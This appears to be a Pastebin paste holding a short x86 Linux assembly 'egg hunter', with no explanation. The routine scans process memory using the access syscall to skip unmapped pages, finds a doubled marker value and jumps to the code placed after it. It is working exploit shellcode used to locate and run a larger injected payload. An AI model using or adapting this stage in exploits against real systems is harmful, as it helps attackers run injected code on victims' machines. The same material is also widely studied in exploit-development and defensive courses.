Advertisement
Guest User

Untitled

a guest
Oct 14th, 2019
111
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.43 KB | None | 0 0
  1. global _start
  2.  
  3. section .text
  4. _start:
  5.  
  6. xor ebx, ebx
  7.  
  8. increment_page:
  9. or dx, 0xfff
  10.  
  11. increment_address:
  12. inc edx
  13. lea ebx, [edx + 4]
  14. push +0x21
  15. pop eax
  16. int 0x80
  17. cmp al, 0xf2
  18. jz increment_page
  19. mov eax, 0x50905090
  20. mov edi, edx
  21. scasd
  22. jnz increment_address
  23. scasd
  24. jnz increment_address
  25. jmp edi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement